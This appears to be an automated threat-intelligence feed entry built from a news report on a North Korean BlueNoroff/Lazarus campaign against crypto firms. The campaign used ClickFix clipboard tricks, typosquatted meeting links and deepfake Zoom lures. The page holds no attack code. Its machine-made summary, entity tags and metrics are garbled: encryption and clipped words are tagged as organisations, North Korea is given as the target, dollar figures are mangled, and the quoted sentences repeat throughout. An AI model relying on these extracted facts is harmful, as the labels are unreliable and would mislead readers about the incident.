INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).

North Korean Hackers Target Crypto Firms with ClickFix and AI-Led Lures

| 2026-04-28 08:00 CRITICAL HIGH
JSON
Executive Summary AI-generated
The recent incident attributed to BlueNoroff, a hacking team linked to the North Korea-linked Lazarus Group, has exposed vulnerabilities in global financial systems. The campaign, which began with high confidence, targeted over 20 countries and five regions, including the US, Singapore, and the UK. The attackers used stolen media from victims' compromised websites as part of their infrastructure, revealing a self-sustaining deepfake pipeline. Spear-phishing campaigns were also employed, utilizing social engineering techniques to impersonate prominent figures in the fintech industry. This sophisticated operation highlights the ongoing threat posed by Lazarus Group and its affiliates, who continue to exploit weaknesses in global systems for financial gain.
Technical Mitigations AI-generated
• Use secure and up-to-date software, such as a reputable antivirus program and a web browser with strong security features. • Implement robust password policies, including multi-factor authentication (MFA) whenever possible. • Regularly update operating systems, browsers, and other software to ensure you have the latest security patches.
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
Campaign Spanning OverCampaign Spanning Over Lazarus GroupLazarus GroupAPT38APT38
Target & Sectors
NORTH_AMERICA NORTH_AMERICA financefinance mediamedia
Incident Timeline
‎at least 2017
North Korean hackers used ClickFix to target crypto firms and AI-made Zoom lures in their SnatchCrypto operation.
target_region Bangladesh
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
organisation the 2016 Bangladesh Bank Swift
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
general_metric 2016 Bank Swift heist
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
financial $951 Stolen / Extorted Funds
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
financial $81 $ m.
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
‎January 23, 2026
Threat actors used spear phishing via typosquatted links and fake meeting invites to target cryptocurrency firms across over 20 countries.
tactic Phishing
Spear-Phishing Via Typosquatted Links and Fake Meeting Invites Arctic Wolf Labs first detected an intrusion by the attackers at a North American cryptocurrency company, beginning January 23, 2026.
tactic T1566 - Phishing
Spear-Phishing Via Typosquatted Links and Fake Meeting Invites Arctic Wolf Labs first detected an intrusion by the attackers at a North American cryptocurrency company, beginning January 23, 2026.
organisation Spear-
Spear-Phishing Via Typosquatted Links and Fake Meeting Invites Arctic Wolf Labs first detected an intrusion by the attackers at a North American cryptocurrency company, beginning January 23, 2026.
victims 100 additional targets
A Spear-Phishing Campaign Spanning Over 20 Countries When Arctic Wolf Labs researchers further analyzed the infrastructure supporting this operation and the trail left by the threat actor, they identified 100 additional targets whose compromised media was hosted on attacker infrastructure.
‎January 2026
North Korean hackers used ClickFix to target cryptocurrency firms and AI-made Zoom lures.
source_region Korea, Democratic People's Republic of
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
source_region DPRK
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
tactic Reconnaissance
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
organisation Picus Security
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
organisation Reconnaissance General Bureau
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
organisation RGB
In a January 2026 report by Picus Security , BlueNoroff is described as “the financial cybercrime arm of Lazarus,” which has itself been publicly attributed to the North Korea’s Reconnaissance General Bureau (RGB).
‎March 2026
North Korean hackers used ClickFix and AI-Made Zoom Lures to target crypto firms.
threat_actor Lazarus Group
According to Arctic Wolf, BlueNoroff is a subgroup of the Lazarus Group and is known under many aliases, including APT38, Sapphire Sleet, TA444, Stardust Chollima, CageyChameleon and Nickel Gladstone.
threat_actor APT38
According to Arctic Wolf, BlueNoroff is a subgroup of the Lazarus Group and is known under many aliases, including APT38, Sapphire Sleet, TA444, Stardust Chollima, CageyChameleon and Nickel Gladstone.
organisation CageyChameleon
According to Arctic Wolf, BlueNoroff is a subgroup of the Lazarus Group and is known under many aliases, including APT38, Sapphire Sleet, TA444, Stardust Chollima, CageyChameleon and Nickel Gladstone.
data_breach 950 files
The threat group’s media server also hosted over 950 files, revealing “a self-sustaining deepfake pipeline,” in which exfiltrated victim webcam footage was merged with AI-generated images to create fake meeting content, said the Arctic Wolf report.
organisation AES
The researchers found evidence of a PowerShell-based command-and-control (C2) implant, an AES-encrypted browser injection payload and a Telegram Bot API screenshot exfiltration mechanism.
‎April 27
Threat actors used ClickFix and AI-Made Zoom Lures to target crypto firms in the Korea, Democratic People's Republic of, DPRK.
source_region Korea, Democratic People's Republic of
Arctic Wolf Labs researchers, who shared a detailed analysis of the full attack lifecycle in a report published on April 27, attributed the campaign “with high confidence” to BlueNoroff, a hacking team tied to the North Korea-linked Lazarus Group .
source_region DPRK
Arctic Wolf Labs researchers, who shared a detailed analysis of the full attack lifecycle in a report published on April 27, attributed the campaign “with high confidence” to BlueNoroff, a hacking team tied to the North Korea-linked Lazarus Group .
organisation BlueNoroff
Arctic Wolf Labs researchers, who shared a detailed analysis of the full attack lifecycle in a report published on April 27, attributed the campaign “with high confidence” to BlueNoroff, a hacking team tied to the North Korea-linked Lazarus Group .
threat_actor Lazarus Group
Arctic Wolf Labs researchers, who shared a detailed analysis of the full attack lifecycle in a report published on April 27, attributed the campaign “with high confidence” to BlueNoroff, a hacking team tied to the North Korea-linked Lazarus Group .
‎2026/04/28
North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures.
organisation North Korean Hackers
North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures.
organisation ClickFix
North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures.
organisation AI-Made Zoom Lures
North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures.
threat_actor Lazarus Group
A team of hackers associated to the North Korean-linked Lazarus Group has conducted a large-scale cyber theft campaign targeting over 100 cryptocurrency organizations across more than 20 countries, according to Arctic Wolf.
victims 100 additional targets
A team of hackers associated to the North Korean-linked Lazarus Group has conducted a large-scale cyber theft campaign targeting over 100 cryptocurrency organizations across more than 20 countries, according to Arctic Wolf.
organisation Microsoft Teams
The spear-phishing campaign involved multiple social engineering techniques, including impersonating prominent figures of the fintech industry, typosquatted Zoom and Microsoft Teams meeting links, fake Calendly calendar invites and ClickFix-style clipboard injection attacks.
organisation Calendly
The spear-phishing campaign involved multiple social engineering techniques, including impersonating prominent figures of the fintech industry, typosquatted Zoom and Microsoft Teams meeting links, fake Calendly calendar invites and ClickFix-style clipboard injection attacks.
Tactical Metrics
Metrics
financial
951,000,000
Stolen / Extorted Funds
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
Metrics
financial
81
$ M.
The group first gained notoriety via the 2016 Bangladesh Bank Swift heist , in which the group attempted to steal $951m, successfully transferring $81m. “The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation , which has been active since at least 2017,” added Arctic Wolf Labs researchers.
Metrics
victims
100
Additional Targets
A Spear-Phishing Campaign Spanning Over 20 Countries When Arctic Wolf Labs researchers further analyzed the infrastructure supporting this operation and the trail left by the threat actor, they identified 100 additional targets whose compromised media was hosted on attacker infrastructure.
A team of hackers associated to the North Korean-linked Lazarus Group has conducted a large-scale cyber theft campaign targeting over 100 cryptocurrency organizations across more than 20 countries, according to Arctic Wolf.
Metrics
data_breach
950
Files
The threat group’s media server also hosted over 950 files, revealing “a self-sustaining deepfake pipeline,” in which exfiltrated victim webcam footage was merged with AI-generated images to create fake meeting content, said the Arctic Wolf report.
Intelligence Sources
Infosecurity-Magazine 2026-04-28
Infosecurity-Magazine 2026-04-28